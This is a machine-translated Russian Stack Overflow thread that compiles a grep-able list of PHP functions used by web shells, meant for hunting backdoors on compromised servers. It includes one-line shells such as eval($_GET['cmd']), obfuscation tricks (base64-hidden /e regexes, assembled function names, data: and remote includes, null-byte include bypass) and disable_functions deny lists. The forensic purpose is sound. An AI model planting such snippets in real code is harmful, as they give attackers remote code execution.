Эксплуатируемые функции PHP

Question

Эксплуатируемые функции PHP

264

Я пытаюсь создать список функций, которые можно использовать для выполнения произвольного кода. Цель состоит не в том, чтобы перечислять функции, которые должны быть внесены в черный список или иным образом запрещены. Скорее, я хотел бы иметь grep -able список ключевых слов с красным флагом, удобный при поиске скомпрометированного сервера для задних дверей.

Идея состоит в том, что если вы хотите создать многоцелевой вредоносный PHP script - например, "веб-оболочку" script, например c99 или r57, вам придется использовать один или несколько относительно небольшого набора функций где-то в файле, чтобы позволить пользователю выполнять произвольный код. Поиск этих функций помогает вам быстрее сузить стог сена десятков тысяч файлов PHP до относительно небольшого набора сценариев, которые требуют более пристального изучения.

Очевидно, что, например, любое из следующего будет считаться вредоносным (или ужасным кодированием):

<? eval($_GET['cmd']); ?>

<? system($_GET['cmd']); ?>

<? preg_replace('/.*/e',$_POST['code']); ?>

и т.д.

Поиск через скомпрометированный веб-сайт на днях я не заметил фрагмента вредоносного кода, потому что я не понимал, что preg_replace может быть опасным с помощью флага /e (что серьезно? это даже там?). Есть ли другие, которые я пропустил?

Вот мой список:

Shell Execute

system
exec
popen
backtick operator
pcntl_exec

Выполнение PHP

eval
preg_replace (с модификатором /e)
create_function
include [_once]/require [_once] (см. комментарий mario для подробностей использования)

Также может быть полезно иметь список функций, способных модифицировать файлы, но я полагаю, что 99% кода эксплойта времени будет содержать хотя бы одну из вышеперечисленных функций. Но если у вас есть список всех функций, способных редактировать или выводить файлы, отправьте его, и я включу его здесь. (И я не считаю mysql_execute, так как эта часть другого класса эксплойта.)

tylerl 25 июнь 2010, в 04:00

Источник

43

как заметку, я хотел бы, чтобы этот список был опубликован в ближайшем будущем, если это возможно :)
yoda 25 июнь 2010, в 04:40
16

@yoda: где опубликовано? Я буду держать список обновленным здесь, так как SO является источником всех знаний.
tylerl 25 июнь 2010, в 08:36
0

в любом месте, если вы планируете выдавать свои спецификации о каждой из функций
yoda 25 июнь 2010, в 16:04
3

Что делает модификатор /e ?
Billy ONeal 13 сен. 2010, в 04:13
6

@Billy: модификатор e делает заменяемую строку как код PHP.
nikc.org 13 сен. 2010, в 06:20
0

как работает взлом оператора backtick?
pinaki 14 сен. 2010, в 07:51
0

@pinaki: оператор packtick эквивалентен shell_exec , поэтому вы можете выполнять произвольный код оболочки и, таким образом, иметь большой контроль над системой;)
NikiC 15 сен. 2010, в 15:05
1

Надо сказать: выполнение кода в регулярном выражении - это то, что делает Perl и, возможно, Python, а не что-то эксклюзивное для PHP. Я не знаю деталей, хотя.
Adriano Varoli Piazza 20 сен. 2010, в 18:21
1

@tylerl Похоже, что крысы это то, что вы пытаетесь построить. Разве это не так?
rook 21 сен. 2010, в 22:58
0

@Rook: На этот вопрос на самом деле нет одного правильного ответа, поэтому каждый может просто по очереди быть «правильным»!
tylerl 19 окт. 2010, в 02:29

Показать ещё 8 комментариев

Теги:

php

security

grep

23 ответа

59

Вам нужно будет сканировать для include ($ tmp) и require (HTTP_REFERER) и * _once. Если эксплойт script может записывать во временный файл, он может просто включить это позже. В основном двухэтапная оценка.

И даже можно скрыть удаленный код с обходными методами, например:

 include("data:text/plain;base64,$_GET[code]");

Кроме того, если ваш веб-сервер уже скомпрометирован, вы не всегда увидите незарегистрированное зло. Часто оболочка эксплойта кодируется gzip. Подумайте о include("zlib:script2.png.gz"); Здесь нет eval, все тот же эффект.

mario 25 июнь 2010, в 05:21

1

В зависимости от того, как настроен PHP, include может фактически включать код из произвольных URL-адресов. Что-то вроде include " example.com/code.phps "; Я видел взломанный веб-сайт, который был взломан с использованием комбинации этой функции и register_globals.
BlackAura 25 июнь 2010, в 17:15
0

@ BlackAura, как regiser_globals вписался в атаку? Может ли это быть так же легко, если использовать $_GET[xyz] а не $xyz ? Или там было что-то более глубокое?
tylerl 25 июнь 2010, в 19:29
0

Я не совсем уверен, почему это было сделано таким образом, но сайт продолжал делать такие вещи: include ($ prefix. '/Filename.php'); Я думаю, что идея состояла в том, чтобы вы могли переместить основной код за пределы веб-корня, установив переменную $ prefix в файле конфигурации. Если злоумышленник установит для этого значения что-то вроде « example.com/code.phps ?», PHP вместо этого включит этот удаленный файл. Насколько я могу судить, бот действительно смог взломать с помощью универсального эксплойта. По-видимому, многие старые PHP-коды допустили эту ошибку. По сути, НИКОГДА не допускайте каких-либо пользовательских значений где-либо рядом с оператором включения
BlackAura 26 июнь 2010, в 09:08
0

Я думаю, что вы можете обобщить это для включений, которые содержат «:» в имени файла ... за исключением того, что имя файла может быть переменной, что затрудняет grep . PHP - какая катастрофа.
tylerl 27 июнь 2010, в 21:32
0

+1, приятно знать .. однако возможно ли использовать, если allow_url_include отключено? версия php 5.2.13
pinaki 14 сен. 2010, в 07:52
2

include не требует скобок; include "…" достаточно.
Gumbo 15 сен. 2010, в 08:40

Показать ещё 4 комментария

50

Это не ответ как таковой, но здесь что-то интересное:

$y = str_replace('z', 'e', 'zxzc');
$y("malicious code");

В том же духе call_user_func_array() может использоваться для выполнения запутанных функций.

Aillyn 17 сен. 2010, в 05:39

1

И нет способа найти это без выполнения кода :( Статический анализ здесь не поможет.
NikiC 17 сен. 2010, в 16:27
15

@tylerl: ... или любой другой язык?
dr Hannibal Lecter 19 сен. 2010, в 16:53
0

@dr Ганнибал Лектор: даже скомпилированные языки?
Ponkadoodle 30 окт. 2010, в 19:44
3

@Wallacoloo: еще проще спрятать бэкдор CGI скомпилированного языка, поскольку в двоичном файле нет простых текстовых строк, которые можно найти в grep.
Iiridayn 05 нояб. 2010, в 19:24
2

Хорошо .. Я пытался с $ f = 'ev'. 'Al'; $ Е ($ _ POST [ 'с']); но не сработало, поскольку 'eval' - это не функция, а специальная конструкция, такая как include, echo и т. д. -> интересно, что exec () нет, и поэтому это будет работать ..
redShadow 08 нояб. 2010, в 00:12
0

+1 за ум
Jens Roland 02 фев. 2011, в 09:09

Показать ещё 4 комментария

20

Я удивлен, что никто не упомянул echo и print как точки безопасности.

Скрипты между сайтами (XSS) - это серьезный эксплойт безопасности, поскольку он даже более распространен, чем эксплойты выполнения на стороне сервера.

Bill Karwin 27 сен. 2010, в 18:03

0

Это будет вектор, который технически влияет на клиента, а не на сервер.
damianb 10 март 2012, в 14:12
0

@damianb: Если сайт использует Ajax, и я могу заставить произвольный javascript быть оцененным в сеансе любого пользователя, я могу причинить много вреда на сервере.
Bill Karwin 10 март 2012, в 17:56
0

"на сервере" .... к клиентам подключенным; это не влияет на серверную часть. Это относится к эксплойтам на стороне клиента, таким как перехват курсора, CSRF, внедрение заголовка и так далее. Да, это опасно, но полностью подпадает под другую классификацию.
damianb 11 март 2012, в 18:17

Показать ещё 1 комментарий

19

В частности, я хочу добавить unserialize() в этот список. Он имел долгую историю различных уязвимостей, включая произвольное выполнение кода, отказ в обслуживании и утечку информации о памяти. Его никогда не следует вызывать по предоставленным пользователем данным. Многие из этих vuls были зафиксированы в релизах в течение последних лет росы, но в настоящее время все еще сохраняется пара неприятных ударов в настоящее время.

Для получения дополнительной информации об уродливых функциях/использовании php смотрите Закаленный PHP-проект и его советы. Также недавний Месяц безопасности PHP и 2007 Месяц ошибок PHP проекты

Также обратите внимание, что при проектировании неэтериализация объекта приведет к выполнению функций конструктора и деструктора; еще одна причина не называть его предоставленными пользователем данными.

Cheekysoft 25 июнь 2010, в 12:04

0

Мне интересно услышать больше о проблеме несериализации. Это просто ошибка в реализации, или это недостаток в дизайне (то есть не может быть исправлено)? Можете ли вы указать мне больше информации по этой проблеме в частности?
tylerl 25 июнь 2010, в 19:27
0

О выполнении произвольного кода и утечке информации в памяти см. Рекомендации Stefan по адресу php-security.org/2010/06/25/…
Cheekysoft 28 июнь 2010, в 12:51
0

В последнем выпуске 5.2.14 исправлена еще одна уязвимость выполнения произвольного кода в unserialize () cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2225 php.net/ChangeLog-5.php#5.2. 14
Cheekysoft 10 авг. 2010, в 15:52

Показать ещё 1 комментарий

17

Мой VPS установлен для отключения следующих функций:

root@vps [~]# grep disable_functions /usr/local/lib/php.ini
disable_functions = dl, exec, shell_exec, system, passthru, popen, pclose, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid

PHP имеет достаточно потенциально разрушаемых функций, которые могут быть слишком большими для вашего списка. Например, PHP имеет chmod и chown, которые могут быть использованы для простого деактивации веб-сайта.

EDIT: возможно, вам захочется создать bash script, который ищет файл для массива функций, сгруппированных по опасностям (функции, которые плохи, функции, которые хуже, функции, которые никогда не должны использоваться) а затем вычислить относительность опасности, которую файл накладывает на процент. Затем выведите это в дерево каталога с процентами, помеченными рядом с каждым файлом, если это превышает 30% опасности.

Josh 25 июнь 2010, в 18:12

0

Вы можете установить флаг «--disable-posix» во время компиляции и удалить все эти функции posix из disable_functions.
The Pixel Developer 15 сен. 2010, в 15:42

15

Также имейте в виду класс "уязвимостей прерывания", которые позволяют читать и записывать произвольные ячейки памяти!

Они влияют на такие функции, как trim(), rtrim(), ltrim(), explode(), strchr(), strstr(), substr(), chunk_split(), strtok(), addcslashes(), str_repeat ( ) и более. Это в значительной степени, но не исключительно, из-за функции переадресации вызова по времени на языке, который устарел на 10 лет, но не отключен.

Для получения дополнительной информации см. статью Стефана Эссерса об уязвимостях прерывания и других проблемах с низким уровнем PHP в BlackHat USA 2009 Slides Paper

В этой статье/презентации также показано, как dl() может использоваться для выполнения произвольного системного кода.

Cheekysoft 10 авг. 2010, в 17:09

0

Вы должны проверить мой ответ.
rook 13 сен. 2010, в 04:02
0

И это тоже очень хороший ответ. +1 тебе. Отличное резюме.
Cheekysoft 13 сен. 2010, в 12:39
1

Уч. Ну, я действительно думал, что PHP был несколько безопасным, прежде чем я взглянул на эти слайды ...
NikiC 31 окт. 2010, в 16:31

Показать ещё 1 комментарий

14

Специфичные по Plattform, но и теоретические векторы exec:

dotnet_load()
новый COM ( "WScript.Shell" )
новая Java ( "java.lang.Runtime" )
event_new() - в конечном итоге

И есть еще много методов маскировки:

proc_open является псевдонимом для popen
call_user_func_array ( "exE".chr(99), array ( "/usr/bin/damage", "--all" ));
file_put_contents ( "/cgi-bin/nextinvocation.cgi" ) && & & CHMOD (...)
PharData:: setDefaultStub - еще одна работа по проверке кода в файлах .phar
runkit_function_rename ( "exec", "innocent_name" ) или APD rename_function

mario 25 июнь 2010, в 16:59

0

также call_user_func () в этом втором списке
Cheekysoft 10 авг. 2010, в 16:05
1

Достаточно одного ответа;) Вы должны просто добавить его к предыдущему.
Justin Johnson 13 сен. 2010, в 04:37
0

интересный список
rook 15 окт. 2010, в 08:15

Показать ещё 1 комментарий

13

Помимо конструкции языка eval существует еще одна функция, которая позволяет выполнять произвольный код: assert

assert('ex' . 'ec("kill --bill")');

NikiC 17 сен. 2010, в 17:07

10

Один источник интересных эксплойтов не упоминался. PHP позволяет содержать строки 0x00. Базовые (libc) функции рассматривают это как конец строки.

Это позволяет использовать ситуации, когда (плохо реализовано) проверка работоспособности в PHP может быть обманута, например. в ситуации вроде:

/// note: proof of principle code, don't use
$include = $_GET['file'];
if ( preg_match("/\\.php$/",$include) ) include($include);

Это может включать любой файл, а не только те, которые заканчиваются на .php, путем вызова script.php?file=somefile%00.php

Таким образом, любая функция, которая не будет соответствовать длине строки PHP, может привести к некоторой уязвимости.

mvds 26 март 2011, в 14:10

0

Пути к файлам с пустыми значениями больше не будут разрешены в 5.4 и последних версиях 5.3.
StasM 20 авг. 2011, в 00:48
0

@stasM Это одна из лучших вещей, которые я когда-либо слышал о PHP. Спасибо, что поделился.
William 26 нояб. 2011, в 20:35

9

Как насчет опасных синтаксических элементов?

" variable variable" ($$var) найдет переменную в текущей области по имени $var. При неправильном использовании удаленный пользователь может изменить или прочитать любую переменную в текущей области. В основном слабее eval.

Ex: вы пишете код $$uservar = 1;, тогда удаленный пользователь устанавливает $uservar в "admin", в результате чего $admin будет установлено в 1 в текущей области.

L̲̳o̲̳̳n̲̳̳g̲̳̳p̲̳o̲̳̳k̲̳̳e̲̳̳ 25 июнь 2010, в 05:33

0

Я понимаю, что вы имеете в виду, но это похоже на другой класс эксплойта. Есть ли способ, которым вы можете выполнить произвольный код PHP с помощью этого механизма (без использования какой-либо из вышеперечисленных функций)? Или его можно использовать только для изменения содержимого переменных? Если я что-то упустил, я хочу сделать это правильно.
tylerl 25 июнь 2010, в 05:50
6

Вы также можете использовать переменные функции, которые невозможно будет выполнить без оценки сценария. Например: $innocentFunc = 'exec'; $innocentFunc('activate skynet'); ,
erisco 25 июнь 2010, в 06:56
0

Также обратите внимание на отражение.
erisco 25 июнь 2010, в 06:57
0

+1 Хорошая информация, манипуляции с глобальными переменными могут быть неприятными, вы должны увидеть мой пост.
rook 13 сен. 2010, в 04:02

Показать ещё 2 комментария

6

Думаю, вы не сможете найти все возможные эксплойты, проанализировав исходные файлы.

Также, если есть действительно большие списки, представленные здесь, вы можете пропустить функцию, которая может быть использована
там все еще может быть "скрытый" злой код, подобный этому

$myEvilRegex = base64_decode ('Ly4qL2U =');

preg_replace ($ myEvilRegex, $_POST ['code']);

Теперь вы можете сказать, я просто расширяю свой script, чтобы также соответствовать этому
но тогда у вас будет этот mayn "возможно, злой код", который, кроме того, вне контекста
чтобы быть (псевдо) безопасным, вы действительно должны писать хороший код и читать весь существующий код самостоятельно

Andreas Linden 23 сен. 2010, в 19:55

0

Я видел, как base64_decode () часто используется для зла в вредоносных программах на базе Wordpress. Хорошее дополнение к списку.
Chris Allen Lane 17 март 2011, в 19:12

5

Добавьте в список pcntl_signal и pcntl_alarm.

С помощью этих функций вы можете обойти любое ограничение set_time_limit, созданное int php.ini или в script.

Этот script, например, будет работать в течение 10 секунд, несмотря на set_time_limit(1);

(Кредит принадлежит Себастьяну Бергманнсу твит и gist:

<?php
declare(ticks = 1);

set_time_limit(1);

function foo() {
    for (;;) {}
}

class Invoker_TimeoutException extends RuntimeException {}

class Invoker
{
    public function invoke($callable, $timeout)
    {
        pcntl_signal(SIGALRM, function() { throw new Invoker_TimeoutException; }, TRUE);
        pcntl_alarm($timeout);
        call_user_func($callable);
    }
}

try {
    $invoker = new Invoker;
    $invoker->invoke('foo', 1);
} catch (Exception $e) {
    sleep(10);
    echo "Still running despite of the timelimit";
}

edorian 13 март 2011, в 21:42

5

Я знаю, что move_uploaded_file упоминается, но загрузка файлов в целом очень опасна. Просто наличие $_FILES должно вызвать некоторую озабоченность.

Вполне возможно встроить PHP-код в любой тип файла. Изображения могут быть особенно уязвимы с текстовыми комментариями. Проблема особенно затруднительна, если код принимает расширение, найденное в $_FILES данных как есть.

Например, пользователь может загрузить действительный файл PNG со встроенным PHP-кодом как "foo.php". Если script является особенно наивным, он может фактически скопировать файл как "/uploads/foo.php". Если сервер настроен на выполнение script исполнения в каталогах загрузки пользователей (часто это случается и ужасный надзор), вы сразу можете запускать любой произвольный PHP-код. (Даже если изображение сохранено как .png, возможно, код будет выполнен с помощью других недостатков безопасности.)

A (неисчерпывающий) список вещей, которые нужно проверить при загрузке:

Обязательно проанализируйте содержимое, чтобы убедиться, что загрузка является типом, который, по его утверждению, является
Сохраните файл с известным безопасным расширением файла, который никогда не будет выполнен
Убедитесь, что PHP (и любое другое исполнение кода) отключено в каталогах загрузки пользователей

Matthew 15 сен. 2010, в 09:29

5

Оператор Backtick Backtick в руководстве php

opHASnoNAME 25 июнь 2010, в 06:22

0

Второй до последнего в первом списке. Но спасибо за вклад.
tylerl 25 июнь 2010, в 04:42

4

Эти функции также могут иметь некоторые неприятные эффекты.

str_repeat()
unserialize()
register_tick_function()
register_shutdown_function()

Первые два могут исчерпать всю доступную память, а последние сохраняют усталость...

Alix Axel 19 сен. 2010, в 15:25

4

Существует множество эксплойтов PHP, которые могут быть отключены настройками в файле PHP.ini. Очевидным примером является register_globals, но в зависимости от настроек также возможно включать или открывать файлы с удаленных компьютеров через HTTP, которые могут быть использованы, если программа использует имена файлов переменных для любой из функций include() или обработки файлов.

PHP также допускает вызов функции переменной путем добавления() в конец имени переменной - например, $myvariable(); будет вызывать имя функции, указанное переменной. Это можно использовать; например, если злоумышленник может заставить переменную содержать слово "eval" и может управлять параметром, тогда он может делать все, что захочет, хотя программа фактически не содержит функцию eval().

Spudley 15 сен. 2010, в 10:28

0

на самом деле это не работает с эхо и Eval.
lawl0r 16 март 2011, в 12:23

2

Я боюсь, что мой ответ может быть слишком негативным, но...

ИМХО, каждая отдельная функция и метод там могут использоваться для гнусных целей. Подумайте об этом как о влиянии нецензурности: переменная присваивается пользователю или удаленному вводу, переменная используется в функции, возвращаемое значение функции, используемое в свойстве класса, свойство класса, используемое в файловой функции, и так далее. Помните: поддельный IP-адрес или атака "человек-в-середине" могут использовать весь ваш сайт.

Лучше всего трассировать от начала до конца любой возможный пользовательский или удаленный вход, начиная с $_SERVER, $_GET, $_POST, $_FILE, $_COOKIE, include(some remote file) (if allow_url_fopen включен), все другие функции/классы, относящиеся к удаленным файлам и т.д. Вы программно создаете профиль трассировки стека для каждого пользовательского или удаленного значения. Это можно сделать программно, получив все повторяющиеся экземпляры назначенной переменной, а также функции или методы, в которых она используется, а затем рекурсивно компилирует список всех вхождений этих функций/методов и т.д. Изучите его, чтобы убедиться, что он сначала проходит надлежащую фильтрацию и проверку функций по отношению ко всем другим функциям, которые он затрагивает. Это, конечно, ручное исследование, в противном случае у вас будет общее количество переключателей case, равное числу функций и методов в PHP (включая определенные пользователем).

В качестве альтернативы для обработки только пользовательского ввода, статический класс контроллера инициализируется в начале всех сценариев, которые 1) проверяют и сохраняют все введенные пользователем входные значения в виде белого списка разрешенных целей; 2) стирает этот входной источник (т.е. $_SERVER = null). Вы можете видеть, где это получает немного Назиске.

bob-the-destroyer 27 март 2011, в 07:17

0

Да, конечно, как и во многих языках программирования, нет никаких способов скрыть свои злые дела. Однако я думаю, что это не соответствует цели, о которой я спрашивал. Сценарий примерно такой: вы призваны помочь после взлома сайта. Клиент доплатит, если вы сможете обезопасить его сайт до утра. Сайт содержит 475 PHP-файлов, а полезная криминалистическая информация уничтожена - у вас огромный стог сена и печально известная маленькая иголка ... с чего вы начали искать? (Моя дневная работа в двух словах)
tylerl 27 март 2011, в 08:35

2

Недавно было обсуждено это на security.stackexchange.com

которые могут использоваться для выполнения произвольного кода

Ну, это немного уменьшает область видимости, но поскольку "печать" может быть использована для ввода javascript (и, следовательно, воровских сессий и т.д.), она все еще несколько произвольна.

не следует перечислять функции, которые должны быть внесены в черный список или иным образом запрещены. Скорее, я хотел бы иметь список grep-able

Это разумный подход.

Подумайте о том, чтобы написать собственный синтаксический анализатор, хотя очень скоро вы поймете, что подход на основе grep выходит из-под контроля (awk будет немного лучше). Довольно скоро вы тоже начнете желать, чтобы вы внедрили белый список!

В дополнение к очевидным, я бы рекомендовал помечать все, что включает include, с аргументом чего-либо, кроме строкового литерала. Следите за __autoload() тоже.

symcbean 18 март 2011, в 13:52

1

Большинство атак в коде используют несколько источников доступа или несколько шагов для выполнения. Я бы искал не только код, либо метод с вредоносным кодом, но и все методы, выполнение функции или ее вызов. Наилучшая безопасность также будет включать в себя кодирование и проверку данных формы, когда она приходит и выходит.

Следите также за тем, чтобы определить системные переменные, после чего они могут быть вызваны из любой функции или метода в коде.

Cninroh 29 март 2011, в 11:29

1

Вот список функций, которые мой провайдер отключает для целей безопасности:

Exec
дл
show_source
apache_note
apache_setenv
closelog
debugger_off
debugger_on
define_syslog_variables
escapeshellarg
EscapeShellCmd
ini_restore
openlog
PassThru
pclose
pcntl_exec
POPEN
proc_close
proc_get_status
proc_nice
proc_open
proc_terminate
shell_exec
Syslog
система
url_exec

Vladislav Rastrusny 29 март 2011, в 10:13

0

Вы можете найти постоянно обновляемый список чувствительных приемников (эксплуатационные функции php) и их параметры в RIPS/config/sinks.php, a статический анализатор исходного кода для уязвимостей в PHP-приложениях, которые также обнаруживают PHP backdoor.

Reiners 01 янв. 2012, в 16:41

0

RIPS использует список с этой страницы.
rook 31 май 2012, в 22:04

0

Несколько переполнений буфера были обнаружены с использованием 4-битного символов, которые интерпретируют текст. htmlentities() htmlspecialchars()

были наверху, хорошая защита - использовать mb_convert_encoding() для преобразования в одиночный кодирование до интерпретации.

ehime 28 апр. 2011, в 22:55

Ещё вопросы

как заметку, я хотел бы, чтобы этот список был опубликован в ближайшем будущем, если это возможно :)
@yoda: где опубликовано? Я буду держать список обновленным здесь, так как SO является источником всех знаний.
в любом месте, если вы планируете выдавать свои спецификации о каждой из функций
@Billy: модификатор e делает заменяемую строку как код PHP.
как работает взлом оператора backtick?
@pinaki: оператор packtick эквивалентен shell_exec , поэтому вы можете выполнять произвольный код оболочки и, таким образом, иметь большой контроль над системой;)
Надо сказать: выполнение кода в регулярном выражении - это то, что делает Perl и, возможно, Python, а не что-то эксклюзивное для PHP. Я не знаю деталей, хотя.
@tylerl Похоже, что крысы это то, что вы пытаетесь построить. Разве это не так?
@Rook: На этот вопрос на самом деле нет одного правильного ответа, поэтому каждый может просто по очереди быть «правильным»!
В зависимости от того, как настроен PHP, include может фактически включать код из произвольных URL-адресов. Что-то вроде include " example.com/code.phps "; Я видел взломанный веб-сайт, который был взломан с использованием комбинации этой функции и register_globals.
@ BlackAura, как regiser_globals вписался в атаку? Может ли это быть так же легко, если использовать $_GET[xyz] а не $xyz ? Или там было что-то более глубокое?
Я не совсем уверен, почему это было сделано таким образом, но сайт продолжал делать такие вещи: include ($ prefix. '/Filename.php'); Я думаю, что идея состояла в том, чтобы вы могли переместить основной код за пределы веб-корня, установив переменную $ prefix в файле конфигурации. Если злоумышленник установит для этого значения что-то вроде « example.com/code.phps ?», PHP вместо этого включит этот удаленный файл. Насколько я могу судить, бот действительно смог взломать с помощью универсального эксплойта. По-видимому, многие старые PHP-коды допустили эту ошибку. По сути, НИКОГДА не допускайте каких-либо пользовательских значений где-либо рядом с оператором включения
Я думаю, что вы можете обобщить это для включений, которые содержат «:» в имени файла ... за исключением того, что имя файла может быть переменной, что затрудняет grep . PHP - какая катастрофа.
+1, приятно знать .. однако возможно ли использовать, если allow_url_include отключено? версия php 5.2.13
include не требует скобок; include "…" достаточно.
И нет способа найти это без выполнения кода :( Статический анализ здесь не поможет.
@dr Ганнибал Лектор: даже скомпилированные языки?
@Wallacoloo: еще проще спрятать бэкдор CGI скомпилированного языка, поскольку в двоичном файле нет простых текстовых строк, которые можно найти в grep.
Хорошо .. Я пытался с $ f = 'ev'. 'Al'; $ Е ($ _ POST [ 'с']); но не сработало, поскольку 'eval' - это не функция, а специальная конструкция, такая как include, echo и т. д. -> интересно, что exec () нет, и поэтому это будет работать ..
Это будет вектор, который технически влияет на клиента, а не на сервер.
@damianb: Если сайт использует Ajax, и я могу заставить произвольный javascript быть оцененным в сеансе любого пользователя, я могу причинить много вреда на сервере.
"на сервере" .... к клиентам подключенным; это не влияет на серверную часть. Это относится к эксплойтам на стороне клиента, таким как перехват курсора, CSRF, внедрение заголовка и так далее. Да, это опасно, но полностью подпадает под другую классификацию.
Мне интересно услышать больше о проблеме несериализации. Это просто ошибка в реализации, или это недостаток в дизайне (то есть не может быть исправлено)? Можете ли вы указать мне больше информации по этой проблеме в частности?
О выполнении произвольного кода и утечке информации в памяти см. Рекомендации Stefan по адресу php-security.org/2010/06/25/…
В последнем выпуске 5.2.14 исправлена еще одна уязвимость выполнения произвольного кода в unserialize () cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2225 php.net/ChangeLog-5.php#5.2. 14
Вы можете установить флаг «--disable-posix» во время компиляции и удалить все эти функции posix из disable_functions.
И это тоже очень хороший ответ. +1 тебе. Отличное резюме.
Уч. Ну, я действительно думал, что PHP был несколько безопасным, прежде чем я взглянул на эти слайды ...
также call_user_func () в этом втором списке
Достаточно одного ответа;) Вы должны просто добавить его к предыдущему.
Пути к файлам с пустыми значениями больше не будут разрешены в 5.4 и последних версиях 5.3.
@stasM Это одна из лучших вещей, которые я когда-либо слышал о PHP. Спасибо, что поделился.
Я понимаю, что вы имеете в виду, но это похоже на другой класс эксплойта. Есть ли способ, которым вы можете выполнить произвольный код PHP с помощью этого механизма (без использования какой-либо из вышеперечисленных функций)? Или его можно использовать только для изменения содержимого переменных? Если я что-то упустил, я хочу сделать это правильно.
Вы также можете использовать переменные функции, которые невозможно будет выполнить без оценки сценария. Например: $innocentFunc = 'exec'; $innocentFunc('activate skynet'); ,
Также обратите внимание на отражение.
+1 Хорошая информация, манипуляции с глобальными переменными могут быть неприятными, вы должны увидеть мой пост.
Я видел, как base64_decode () часто используется для зла в вредоносных программах на базе Wordpress. Хорошее дополнение к списку.
Второй до последнего в первом списке. Но спасибо за вклад.
на самом деле это не работает с эхо и Eval.
Да, конечно, как и во многих языках программирования, нет никаких способов скрыть свои злые дела. Однако я думаю, что это не соответствует цели, о которой я спрашивал. Сценарий примерно такой: вы призваны помочь после взлома сайта. Клиент доплатит, если вы сможете обезопасить его сайт до утра. Сайт содержит 475 PHP-файлов, а полезная криминалистическая информация уничтожена - у вас огромный стог сена и печально известная маленькая иголка ... с чего вы начали искать? (Моя дневная работа в двух словах)
RIPS использует список с этой страницы.

rook · Accepted Answer · 2010-09-13T04-04-00.000Z

Чтобы создать этот список, я использовал 2 источника. Исследование в алого и RATS. Я также добавил некоторые из моих собственных в микс, и люди в этой теме помогли.

Изменить: После публикации этого списка я связался с основоположником RIPS и на данный момент это поиск инструментов PHP-код для использования каждой функции в этом списке.

Большинство этих вызовов функций классифицируются как Sinks. Когда зараженная переменная (например, $_REQUEST) передается в функцию приемника, у вас есть уязвимость. Программы, такие как RATS и RIPS используют grep like чтобы идентифицировать все приемники в приложении. Это означает, что программисты должны проявлять особую осторожность при использовании этих функций, но если они будут запрещены, то вы не сможете многое сделать.

"С великой силой приходит большая ответственность".

- Стэн Ли

Выполнение команды

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
`` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec     - Executes a program

Выполнение кода PHP

Помимо eval существуют другие способы выполнения PHP-кода: include/require может использоваться для удаленного выполнения кода в виде Local File Include и Удаленный файл Включить уязвимости.

eval()
assert()  - identical to eval()
preg_replace('/.*/e',...) - /e does an eval() on the match
create_function()
include()
include_once()
require()
require_once()
$_GET['func_name']($_GET['argument']);
$func = new ReflectionFunction($_GET['func_name']); $func->invoke(); or $func->invokeArgs(array());

Список функций, которые принимают обратные вызовы

Эти функции принимают строковый параметр, который можно использовать для вызова функции выбора злоумышленника. В зависимости от функции злоумышленник может или не может иметь возможность передать параметр. В этом случае можно использовать функцию Information Disclosure, такую как phpinfo().

Function                     => Position of callback arguments
'ob_start'                   =>  0,
'array_diff_uassoc'          => -1,
'array_diff_ukey'            => -1,
'array_filter'               =>  1,
'array_intersect_uassoc'     => -1,
'array_intersect_ukey'       => -1,
'array_map'                  =>  0,
'array_reduce'               =>  1,
'array_udiff_assoc'          => -1,
'array_udiff_uassoc'         => array(-1, -2),
'array_udiff'                => -1,
'array_uintersect_assoc'     => -1,
'array_uintersect_uassoc'    => array(-1, -2),
'array_uintersect'           => -1,
'array_walk_recursive'       =>  1,
'array_walk'                 =>  1,
'assert_options'             =>  1,
'uasort'                     =>  1,
'uksort'                     =>  1,
'usort'                      =>  1,
'preg_replace_callback'      =>  1,
'spl_autoload_register'      =>  0,
'iterator_apply'             =>  1,
'call_user_func'             =>  0,
'call_user_func_array'       =>  0,
'register_shutdown_function' =>  0,
'register_tick_function'     =>  0,
'set_error_handler'          =>  0,
'set_exception_handler'      =>  0,
'session_set_save_handler'   => array(0, 1, 2, 3, 4, 5),
'sqlite_create_aggregate'    => array(2, 3),
'sqlite_create_function'     =>  2,

Раскрытие информации

Большинство этих вызовов функций не являются приемниками. Но скорее это может быть уязвимость, если какой-либо из возвращаемых данных можно просмотреть злоумышленнику. Если злоумышленник может видеть phpinfo(), это определенно уязвимость.

phpinfo
posix_mkfifo
posix_getlogin
posix_ttyname
getenv
get_current_user
proc_get_status
get_cfg_var
disk_free_space
disk_total_space
diskfreespace
getcwd
getlastmo
getmygid
getmyinode
getmypid
getmyuid

Другие

extract - Opens the door for register_globals attacks (see study in scarlet).
parse_str -  works like extract if only one argument is given.  
putenv
ini_set
mail - has CRLF injection in the 3rd parameter, opens the door for spam. 
header - on old systems CRLF injection could be used for xss or other purposes, now it is still a problem if they do a header("location: ..."); and they do not die();. The script keeps executing after a call to header(), and will still print output normally. This is nasty if you are trying to protect an administrative area. 
proc_nice
proc_terminate
proc_close
pfsockopen
fsockopen
apache_child_terminate
posix_kill
posix_mkfifo
posix_setpgid
posix_setsid
posix_setuid

Функции файловой системы

В соответствии с RATS все функции файловой системы в php являются неприятными. Некоторые из них не очень полезны для злоумышленника. Другие полезнее, чем вы думаете. Например, если allow_url_fopen=On, то URL-адрес может использоваться как путь к файлу, поэтому вызов copy($_GET['s'], $_GET['d']); может быть использован для загрузки PHP скрипт в любом месте системы. Также, если сайт уязвим для отправки запроса через GET, каждый из этих функций файловой системы может злоупотреблять каналом и атаковать другого хоста через ваш сервер.

// open filesystem handler
fopen
tmpfile
bzopen
gzopen
SplFileObject->__construct
// write to filesystem (partially in combination with reading)
chgrp
chmod
chown
copy
file_put_contents
lchgrp
lchown
link
mkdir
move_uploaded_file
rename
rmdir
symlink
tempnam
touch
unlink
imagepng   - 2nd parameter is a path.
imagewbmp  - 2nd parameter is a path. 
image2wbmp - 2nd parameter is a path. 
imagejpeg  - 2nd parameter is a path.
imagexbm   - 2nd parameter is a path.
imagegif   - 2nd parameter is a path.
imagegd    - 2nd parameter is a path.
imagegd2   - 2nd parameter is a path.
